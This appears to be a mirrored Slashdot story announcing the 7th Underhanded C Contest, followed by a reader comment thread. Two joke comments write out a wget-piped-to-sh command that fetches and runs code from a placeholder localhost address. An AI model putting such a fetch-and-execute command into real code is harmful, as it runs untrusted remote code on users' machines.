Slashdot Mirror

← Back to Stories (view on slashdot.org)

The 7th Underhanded C Contest Is Online

Posted by samzenpus on from the back-again dept.

Xcott Craver writes The 7th Underhanded C Contest is now open. The goal of the contest is to write code that is as readable, clear, innocent and straightforward as possible, and yet somehow exhibits evil behavior that cannot be seen even when staring at the source code. The winners from 2013 are also online, and their clever and insightful submissions make for fun reading.

27 of 41 comments (clear)

  1. New twist this time by Anonymous Coward · · Score: 5, Funny

    Previously the contest has been about doing nefarious stuff to the user of the program while keeping the code innocuous.
    This time, they want you to clandestinely warn users of government spying. It's a complete about-face on the definition of "underhanded". I love it.

    1. Re:New twist this time by Wonko+the+Sane · · Score: 3, Funny

      This NSA recruiting program has to become more subtle in order to attract participants.

    2. Re:New twist this time by Anonymous Coward · · Score: 3, Informative

      If you read the whole thing you'd notice that you're playing the role of an NSA insider who's leaking information... I thought you people liked that sort of thing?

    3. Re:New twist this time by alvinrod · · Score: 4, Insightful

      Or it gives some insiders who might want to do such a thing a few ideas of how to go about it while maintaining plausible deniability.

  2. Re:The previous entry page leads to 404 by Xcott+Craver · · Score: 4, Funny

    That's not a defunct link to previous entries, but a defunct link to a previous version of the contest site. I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.

    You can see the previous entries by scrolling down, or by selecting "past years" from the menu bar on the web page.

  3. Re:The previous entry page leads to 404 by gstoddart · · Score: 4, Funny

    I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.

    What defunct are you talking about? ;-)

    --
    Lost at C:>. Found at C.
  4. Re:The previous entry page leads to 404 by oodaloop · · Score: 4, Funny

    I've un-defuncteded

    So it's totally funct now?

    --
    Tic-Tac-Toe, Global Thermonuclear War, and relationships all have the same winning move.
  5. Not so clever by Anonymous Coward · · Score: 3, Informative

    Don't get me wrong this is all great fun yet many of these schemes stand no chance of being committed in any serious project.

    Implicit returns generate compiler warnings.

    printf variable as format specifier is a well known security issue lazy eyeballs and static analysis tools check for.

    Serialization delimiter games are also well known issues standing little chance of being accepted.

    1. Re:Not so clever by BlackPignouf · · Score: 3, Funny

      Yeah right.
      Something like this http://www.gergely.risko.hu/de... would never get committed.

    2. Re:Not so clever by Anonymous Coward · · Score: 1

      To be fair, the macro Debian removed was causing all sorts of warnings from one of them thar "analysis tools" for using uninitialized memory.

    3. Re:Not so clever by frank_adrian314159 · · Score: 1

      CVE is a thing because static analysis tools are too chatty about too many things that have no chance of causing failure given your particular architecture or other system characteristics, but need to be examined/handled nevertheless. Tie that in with often subpar tools with subpar UI's and/or configurability and/or management that worries more about new features than code hygiene, and you will be saddled with CVE's because the tools wont be used, no matter how many issues they might find.

      --
      That is all.
    4. Re:Not so clever by Ihlosi · · Score: 1
      Think of it this way: These contests exist so that clever programmers can expose flaws in our tools.

      Or in our knowledge. Some entries are based on the fact that the compiler doesn't know what the program is supposed to do, and the person looking at it may not know all the subtleties of the language's syntax. The compiler sees perfectly innocent code, but the code doesn't do what the person reading it thinks it does.

      It would be nice if the scoring criteria were better defined, e.g. "this bug will be detected if syntax coloring is on/compiler warning level is set to max/linker warning level is set to max/MISRA rules are applied to the code/etc.".

  6. My entry by whereiswaldo · · Score: 1

    exec("wget -O- http: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");

    1. Re:My entry by weilawei · · Score: 2

      For best results, use FTP! Comes with free side effects.*

      exec("wget -O- ftp: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");

      (*FTP offer is nontransferable and must be presented at time of online download or Promo Code must be entered at 127.0.0.1 to receive discount. Underhanded discounts applied prior to percent-off total download discounts. Offer cannot be used in conjunction with any other percent-off discounts, including version-specific discounts. Offer not valid on the following merchandise: OpenBSD CD purchases; wget Cares® cause merchandise or other charitable items; prestige brands of operating systems, hardware and select prestige brands of headphones; select electronics/electrics and select Windows merchandise. For a complete list of these merchandise exclusions, click here or look for signs in our stores. Offer also not valid on byte adjustments on prior downloads; payment on a wget’s Charge account; taxes, shipping and/or handling fees. Subject to credit approval. See store for details.

  7. Re:The previous entry page leads to 404 by Anonymous Coward · · Score: 1

    Yes, and I'm very gruntled.

  8. Not so clever by slashdice · · Score: 4, Insightful

    were that true, CVE wouldn't be a thing.

    --
    Copyright (c) 1990 - 2014 Dice. All rights reserved. Use of this comment is subject to certain Terms and Conditions.
  9. OpenSSL by Anonymous Coward · · Score: 5, Funny

    Sorry guys but this year's winner hands down is OpenSSL.

    1. Re:OpenSSL by swillden · · Score: 4, Funny

      Sorry guys but this year's winner hands down is OpenSSL.

      No, underhanded C submissions have to be readable, clear and straightforward. OpenSSL is none of those.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
    2. Re:OpenSSL by babydog · · Score: 1

      Hey, it _usually_ compiles.

  10. That was fast! by Ihlosi · · Score: 1

    The last contest only ended a few weeks ago!

  11. Re:The problem with UCC by umghhh · · Score: 1

    to have design flaws one would need design process in the first place. for number of years already I mostly see coding without design.

  12. Do what Amarok 1.4 does to MP3 tags. by throwawayUnderhanded · · Score: 2

    In Amarok 1.4, when you change the tags in an MP3 file, they are not actually ASCII, they are some kind of UTF-8 reencode that looks exactly like ASCII in Amarok and get printed correctly on a terminal. But when the files are transferred and displayed on some MP3 players they appear as "mojibake".

    1. Re:Do what Amarok 1.4 does to MP3 tags. by Anonymous Coward · · Score: 1

      I transcoded some FLACs to mp3s the other day using mp3fs (aside: which is actually really cool, it's a fuse filesystem that you point to somewhere containing flacs, and when you browse the mount point all the .flac files show up as .mp3 and you can just copy the mp3 files out). The FLAC tags are readable in Windows (both winamp and QuodLibet) and Linux. The mp3 tags are readable in Windows (winamp, QuodLibet and File Explorer's tracklist view) and Linux. All of the tags are gibberish on my car's in-dash MP3 player, even the ones that are just plain English.

      I suspect (damned if I'm going to care long enough to find out) that it's using UTF16 for the tags and the car radio is flipping out over the null bytes in the tags.

    2. Re:Do what Amarok 1.4 does to MP3 tags. by dotancohen · · Score: 1

      It might be rendering the tags in UTF-16, which for code points \x00 - \x7F look just like ASCII with a NULL byte \x00 before (Big Endian) or after (Little Endian) each printable character.

      Can you give an example? I'll take a look. Run Unix "strings" on the file, run it through "hd" and post it as a reply here.

      $ strings file.mp3 | grep "known text" | hd

      --
      It is dangerous to be right when the government is wrong.
  13. Re:The previous entry page leads to 404 by DRJlaw · · Score: 2

    What defunct are you talking about? ;-)

    We want the funct!
    Give up the funct!
    We need the funct!
    We gotta have that funct!

    Owww! Stop the hitting...

  14. needed for comparison: UJC by Anonymous Coward · · Score: 1

    Most of the entries in past years have relied on subtle use of unsafe code (buffer overruns, platform-dependent quirks, etc.) for which there are plenty of opportunities in C. I'd really like to see them run, in parallel with the same challenge, an Underhanded Java Contest.

  15. BeOS used to do that with CDs by Xcott+Craver · · Score: 1

    They added a feature to the filesystem that let you insert a music CD and see the tracks as WAV files, so you could rip the CD simply by dragging them to your desktop.

    I remember that because I tried to play a CD by selecting all the tracks in the folder and double-clicking, only to hear the OS play all the CD tracks at the same time.